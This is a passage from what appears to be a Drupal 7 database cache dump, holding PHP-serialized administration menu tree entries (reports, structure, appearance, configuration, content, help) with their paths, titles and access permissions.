themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:352;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"352\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"352\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:353;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"353\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"353\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:354;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"354\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"354\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:355;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"355\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"355\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many pages.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:358;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"358\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"358\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423659086,1),('links:management:tree-data:en:4490f7db324c2eccb23dc5aef88739c8a281e26afc516ac3daba41c0c38e047b','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site 